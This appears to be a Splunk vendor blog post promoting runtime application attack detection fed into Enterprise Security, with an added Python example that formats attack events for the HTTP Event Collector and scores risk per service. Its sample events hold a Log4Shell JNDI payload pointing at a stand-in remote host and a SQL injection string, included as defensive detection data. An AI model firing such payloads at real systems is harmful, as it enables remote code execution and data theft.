Splunk Delivers Unified Security and Observability to Protect Applications
Bring application and security teams together with end-to-end application threat detection and response—right inside Splunk.
Why Application Context Is the Missing Link in Security
As attackers increasingly target the application layer, organizations are under pressure to detect and respond faster—but they’re flying blind without the right context.
Recent research underscores how urgent and complex today's application security challenges have become. 68% of organizations leave critical vulnerabilities unresolved for more than 24 hours [1], and 35% say that a lack of context about those vulnerabilities hinders their ability to remediate them effectively. Meanwhile, the threat landscape is intensifying: attacks targeting open-source vulnerabilities rose 742% year over year [2]. The consequences are steep: the average cost of a breach in the U.S. has reached $9.44 million [3], it takes an average of 277 days to fully contain an incident [4], and 60% of breaches involve data exfiltration within one day [4].
It’s no longer enough to detect vulnerabilities—you need to know what’s being exploited, how, where and in real time.
Introducing: Secure Application and Splunk Security
To close this gap, we're introducing an integration between Secure Application, part of the Splunk Observability portfolio delivered through Splunk AppDynamics, and Splunk Enterprise Security.
This integration enables real-time application attack detection for hybrid and on-prem environments using the Splunk AppDynamics agents (support for microservices-based applications instrumented with Splunk Observability Cloud and OpenTelemetry is coming soon). It gives security analysts and observability teams a shared source of truth for understanding runtime threats in the context of production and pre-production applications.
Why It Matters
For security teams:
Gain the observability data you've been missing: track actual exploit attempts, identify the impacted services, and correlate attacks with indicators of compromise directly in Splunk Enterprise Security.
For observability teams:
Elevate your role in security—your telemetry data becomes a critical input to protecting the business, helping to flag and fix issues before they become breaches.
How It Works
Secure Application monitors application runtime behavior to detect actual exploit attempts as they happen. When it detects an attack, it captures actionable context, such as the invoked methods, the vulnerable service, the input payload and exploit metadata, and immediately forwards that data to Splunk through the HTTP Event Collector (HEC), Splunk's token-authenticated HTTPS endpoint for ingesting events. As with any HEC integration, give this feed its own token, restrict that token to the destination index, and keep TLS certificate validation enabled on the sending side rather than disabling it to get past a self-signed certificate.
Once inside Splunk, this telemetry powers:
- Findings-based detection in Splunk Enterprise Security
- Risk-Based Alerting and prioritization using Splunk correlation rules
- Enrichment with application threat context from Secure Application for smarter triage
Security teams use this information to collaborate with application teams and launch remediation workflows from Splunk Enterprise Security and Splunk SOAR.
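As an added example (not code from this post, from Splunk, or from Secure Application), the block below shows what the HEC envelope for such an attack event looks like and how a risk-scoring pass of the kind Risk-Based Alerting performs can be expressed over a batch of them. It assumes a Splunk host and a placeholder token, and it uses a constructed event schema (service, CVE, exploitability score, invoked method, source IP, payload, outcome) modeled on the runtime insights listed later in this post; the field names, the outcome weights and the alerting threshold are this example's own choices, not Secure Application's schema or Enterprise Security's rules.

```python
"""Added example: shaping runtime attack events for Splunk HEC and scoring them
the way a Risk-Based Alerting correlation search would. Field names, weights and
threshold are assumptions for illustration, not product schemas or rules."""
import json
import urllib.request
from collections import defaultdict

# Assumed endpoint and placeholder token: a real deployment uses its own HEC
# token, restricted to the destination index, over verified TLS.
HEC_ENDPOINT = "https://splunk.example.com:8088/services/collector/event"
HEC_TOKEN = "00000000-0000-0000-0000-000000000000"

# Constructed sample events (not real telemetry). The first two are Log4Shell
# probes against one service, the second of which the agent saw succeed.
SAMPLE_ATTACK_EVENTS = [
    {"timestamp": 1718000000, "host": "app-01", "service": "order-api",
     "attack_type": "remote-code-execution", "cve": "CVE-2021-44228",
     "exploitability_score": 92, "outcome": "blocked",
     "method": "org.apache.logging.log4j.core.lookup.JndiLookup.lookup",
     "source_ip": "198.51.100.23", "payload": "${jndi:ldap://198.51.100.23/a}"},
    {"timestamp": 1718000060, "host": "app-01", "service": "order-api",
     "attack_type": "remote-code-execution", "cve": "CVE-2021-44228",
     "exploitability_score": 92, "outcome": "exploited",
     "method": "org.apache.logging.log4j.core.lookup.JndiLookup.lookup",
     "source_ip": "198.51.100.23", "payload": "${jndi:ldap://198.51.100.23/b}"},
    {"timestamp": 1718000120, "host": "app-02", "service": "catalog-web",
     "attack_type": "sql-injection", "cve": None,
     "exploitability_score": 40, "outcome": "blocked",
     "method": "com.example.catalog.CatalogDao.search",
     "source_ip": "203.0.113.9", "payload": "' OR 1=1--"},
]

# Multiplier applied to the exploitability score by attack outcome (assumed).
OUTCOME_WEIGHT = {"exploited": 5, "blocked": 1}


def to_hec_event(attack, index="appsec", sourcetype="secureapp:attack"):
    """Wrap one attack record in the HEC event envelope: indexing metadata
    (time, host, source, sourcetype, index) plus the record as the JSON body."""
    return {
        "time": attack["timestamp"],
        "host": attack["host"],
        "source": "secure-application",
        "sourcetype": sourcetype,
        "index": index,
        "event": attack,
    }


def hec_batch_body(attacks):
    """HEC accepts several event objects in one POST body, one JSON object per
    line, so a burst of attacks costs one request rather than one per event."""
    return "\n".join(json.dumps(to_hec_event(a)) for a in attacks)


def hec_headers(token):
    """HEC authenticates with the 'Splunk <token>' authorization scheme."""
    return {"Authorization": f"Splunk {token}", "Content-Type": "application/json"}


def post_events(body, endpoint=HEC_ENDPOINT, token=HEC_TOKEN, timeout=10):
    """Send a batch to HEC. Not executed offline. urlopen verifies the server
    certificate chain by default; keep it that way."""
    req = urllib.request.Request(endpoint, data=body.encode("utf-8"),
                                 headers=hec_headers(token), method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.loads(resp.read())  # {"text": "Success", "code": 0} on success


def risk_score(attack):
    """Risk contribution of one event: exploitability, multiplied up when the
    runtime agent observed the exploit succeed rather than being blocked."""
    return attack["exploitability_score"] * OUTCOME_WEIGHT.get(attack["outcome"], 1)


def risk_by_service(attacks):
    """Accumulate risk per application service, as an RBA correlation search
    does over a time window before comparing the total with a threshold."""
    totals = defaultdict(int)
    for a in attacks:
        totals[a["service"]] += risk_score(a)
    return dict(totals)


def services_over_threshold(attacks, threshold=100):
    """Services whose accumulated risk warrants a finding, highest risk first."""
    totals = risk_by_service(attacks)
    return sorted((s for s, r in totals.items() if r >= threshold),
                  key=lambda s: -totals[s])


def exploited_cves(attacks):
    """CVEs with at least one successful exploit: the shortlist to hand to the
    application team alongside the vulnerable method and stack trace."""
    return sorted({a["cve"] for a in attacks
                   if a["outcome"] == "exploited" and a["cve"]})


if __name__ == "__main__":
    print(hec_batch_body(SAMPLE_ATTACK_EVENTS))
    print(risk_by_service(SAMPLE_ATTACK_EVENTS))
    print(services_over_threshold(SAMPLE_ATTACK_EVENTS))
    print(exploited_cves(SAMPLE_ATTACK_EVENTS))
```

With the constructed sample, the two Log4Shell events against order-api accumulate 552 risk points (92 for the blocked probe, 460 for the successful one) while catalog-web stays at 40, so only order-api crosses the 100-point threshold. Weighting by outcome is the point of having the runtime agent in the loop: a vulnerability scanner would score both services on CVSS alone, whereas the agent knows which exploit actually landed.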
From Detection to Investigation—Without Losing Context
Secure Application doesn’t just detect the presence of a threat—it gives security and observability teams a detailed breakdown of the threat in application terms. Once ingested, alerts surface directly in Splunk Enterprise Security, correlation searches, and investigation workflows.
Security teams can instantly pivot into runtime insights, including:
- Application service name
- Attack event metadata
- Associated vulnerabilities and CVEs
- Cisco exploitability scores
- Stack traces and invoked methods
- Source IPs and payload characteristics
With this context, analysts can investigate an attack in application terms, understanding not just that something happened, but how, where and why.
Application-Aware Threat Hunting Has Arrived
Through Secure Application, teams can trace each attack event back to its execution path, understand its potential impact, and correlate it with other infrastructure, identity, or network signals already present in Splunk.
All of this is accessible without switching tools—giving security and observability teams a seamless way to detect and remediate real threats, faster than ever before.
Figure: Secure Application Log4j attack view showing real-time attack details, including the stack trace, service impact and vulnerable method.
Splunk and Cisco: Better Together
This integration showcases the strength of the combined Cisco and Splunk security ecosystem. Vulnerabilities detected at runtime by Secure Application are automatically enriched with exploitability data from Cisco Vulnerability Management (formerly Kenna.VM), helping teams make faster, more informed decisions about what to address first.
Together, Splunk and Cisco help you move beyond alerts and static scans—toward real-time, risk-informed application security.
A New Era of Unified Security and Observability to Drive Digital Resilience
With this integration, Splunk brings runtime application security into the hands of both SOC analysts and observability teams—so they can work together to detect, investigate, and contain threats and drive digital resilience.
By unifying application telemetry with security analytics, organizations can now:
- Detect real-time runtime attacks in hybrid/on-prem apps
- Prioritize and investigate based on exploitability and application impact
- Accelerate cross-team collaboration to contain threats faster
To see how this integration can improve your security posture:
- Contact your Splunk Observability or Security sales lead to schedule a demo
- Read the integration guide for the technical integration details
- Attend upcoming Cisco Live 2025 or .conf25 sessions or review the recordings
Let’s stop runtime threats—together.
[1] Swimlane, "Under Pressure: Is Vulnerability Management Keeping Up?", 2024.
[2] Sonatype, 8th Annual State of the Software Supply Chain Report.
[3] Ponemon Institute and IBM report, 2024.
[4] Cisco Security, 2020.